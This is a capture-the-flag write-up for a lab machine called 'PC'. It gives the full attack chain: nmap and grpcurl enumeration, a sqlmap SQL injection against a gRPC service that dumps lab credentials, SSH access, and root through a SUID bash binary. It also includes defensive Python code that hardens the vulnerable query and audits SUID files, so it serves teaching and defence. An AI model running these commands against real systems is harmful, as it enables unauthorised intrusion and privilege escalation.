PC

1. Initial recon

1.1. nmap

nmap -p- 10.10.11.214 -Pn

PORT      STATE SERVICE
22/tcp    open  ssh
50051/tcp open  unknown

2. user.txt

2.1. gRPC

A Google search for port 50051 reveals that this port is generally used for gRPC.

Following this blog post, I can start to find out how to enumerate gRPC.

Using grpcurl we can see that there is a service called SimpleApp running (the server also exposes gRPC reflection, which is what lets grpcurl list services and methods without the .proto file):

./grpcurl --plaintext 10.10.11.214:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection

and that the service exposes 3 methods:

./grpcurl --plaintext 10.10.11.214:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

Now let's use grpcui to get a web UI for the application:

./grpcui -plaintext 10.10.11.214:50051
gRPC Web UI available at http://127.0.0.1:36185/

If we try to use the getInfo method we get the following output:

{
  "message": "Authorization Error.Missing 'token' header"
}

So we may need to use the RegisterUser and then LoginUser methods to get our token.

If we try to make a user with the name admin we get an error saying that the user already exists. However, we can use the credentials admin:admin with the LoginUser method and generate a token. Taking note of the id and token we are given, let's use them with the getInfo method and see what we get:

{
  "message": "Will update soon."
}

Let's try some other numbers for the id, like 1:

Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptable

Time to do some research.

2.2. SQLmap

This Medium article discusses how SQL injection can show up in gRPC services, so let's capture a request to the getInfo method using Burp Suite and see if sqlmap can do anything for us.

sqlmap -r req.txt -dbs --batch

[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[WARNING] on SQLite it is not possible to enumerate databases (use only '--tables')

sqlmap -r req.txt --tables --batch

[INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+

sqlmap -r req.txt -T accounts --batch --dump

Table: accounts
[2 entries]
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| HereIsYourPassWord1431 | sau      |
+------------------------+----------+

We can use the credentials sau:HereIsYourPassWord1431 to SSH into the machine for the user flag.
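The two symptoms above (the getInfo TypeError on an unknown id, and sqlmap finding an injectable SQLite query) are what a string-built query plus an unchecked fetchone() look like from the outside. The following is an added example, not the box's source code: a minimal model of a getInfo handler, first as the kind of code that produces both symptoms, then hardened. The real SimpleApp schema is not on the page; the table and column names below are constructed to mirror the table names sqlmap reported and are an assumption.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the SQLite database sqlmap reported."""
    conn = sqlite3.connect(":memory:")
    # Column names are an assumption; only the table names come from the sqlmap output.
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, owner TEXT, message TEXT)")
    conn.executemany(
        "INSERT INTO accounts (username, password) VALUES (?, ?)",
        [("admin", "admin"), ("sau", "CONSTRUCTED-PLACEHOLDER")],
    )
    conn.executemany(
        "INSERT INTO messages (id, owner, message) VALUES (?, ?, ?)",
        [(1, "admin", "Will update soon."), (2, "sau", "hello sau")],
    )
    conn.commit()
    return conn


def get_info_vulnerable(conn, id_value):
    """Handler shape that reproduces both symptoms seen on the box.

    The id is pasted into the SQL text, so whatever the client sends is parsed
    as SQL (what sqlmap found), and fetchone() is indexed without a None check,
    so an id with no row raises "'NoneType' object is not subscriptable".
    """
    row = conn.execute(f"SELECT message FROM messages WHERE id = {id_value}").fetchone()
    return {"message": row[0]}


def get_info_hardened(conn, id_value, caller):
    """Same lookup with the three fixes a reviewer would ask for."""
    # 1. Strict input type: the id must be an integer before it gets near SQL.
    try:
        id_int = int(str(id_value).strip())
    except ValueError:
        return {"message": "Invalid id."}
    # 2. Parameterised query: the driver binds the value, it is never SQL text.
    # 3. Scoped to the authenticated caller, so a valid token cannot read other
    #    users' rows just by changing the id (the token on the box only proved
    #    identity; it did not tie the id to the caller).
    row = conn.execute(
        "SELECT message FROM messages WHERE id = ? AND owner = ?",
        (id_int, caller),
    ).fetchone()
    # 4. Explicit not-found result instead of an unhandled exception that leaks
    #    the implementation language and stack details to the client.
    if row is None:
        return {"message": "No message for that id."}
    return {"message": row[0]}


if __name__ == "__main__":
    db = make_db()
    print(get_info_vulnerable(db, "1"))          # {'message': 'Will update soon.'}
    print(get_info_hardened(db, "1", "admin"))   # {'message': 'Will update soon.'}
    print(get_info_hardened(db, "99", "admin"))  # {'message': 'No message for that id.'}
```

Detection-wise, the unhandled TypeError is the easiest signal to alert on: a gRPC server that returns Python exception text in its status message is telling you that input validation is missing, and that is worth a log search before anyone runs sqlmap against it.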

3. root.txt

Running a command to check for SUID binaries:

find / -type f -perm -04000 -ls 2>/dev/null

we can see that bash is there, so simply run /usr/bin/bash -p for root!
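The find command above is the attacker's view; the same check is cheap to run as a recurring audit from the other side. This is an added example, not part of the writeup: a small Python audit that lists SUID regular files, flags any that are shells or interpreters (which should essentially never carry the setuid bit), and diffs the current set against a saved baseline so a newly added SUID file stands out. The interpreter name list and the baseline path are assumptions.

```python
import os
import stat

# Names that should not be setuid on a normal host (assumption; extend as needed).
INTERPRETER_NAMES = {
    "bash", "sh", "dash", "zsh", "ksh", "ash",
    "python", "python2", "python3", "perl", "ruby", "php", "lua",
}


def is_suid(path):
    """True for a regular file with the setuid bit set (no symlink following)."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(root="/"):
    """Walk the tree and return sorted paths of SUID regular files."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if is_suid(path):
                    found.append(path)
            except OSError:
                # unreadable or vanished entries are skipped, like 2>/dev/null above
                continue
    return sorted(found)


def flag_interpreters(paths):
    """Return the subset of paths whose basename is a shell or interpreter."""
    return [p for p in paths if os.path.basename(p) in INTERPRETER_NAMES]


def new_since_baseline(baseline, current):
    """Paths that are SUID now but were not in the recorded baseline."""
    return sorted(set(current) - set(baseline))


def load_baseline(path):
    """Read one path per line; missing file means an empty baseline."""
    try:
        with open(path) as fh:
            return [line.strip() for line in fh if line.strip()]
    except FileNotFoundError:
        return []


if __name__ == "__main__":
    # Hypothetical baseline location; write it once on a known-good host with
    # "python3 audit.py --save" or simply redirect find_suid() output to it.
    baseline_path = "/var/lib/suid-baseline.txt"
    current = find_suid("/")
    for path in flag_interpreters(current):
        print(f"SUID interpreter: {path}  (remediate with: chmod u-s {path})")
    for path in new_since_baseline(load_baseline(baseline_path), current):
        print(f"new SUID file since baseline: {path}")
```

Running it on the box would print /usr/bin/bash under the first check, which is exactly the finding the writeup exploits; removing the bit with chmod u-s closes it, and keeping the baseline in configuration management makes the second check catch a re-added bit.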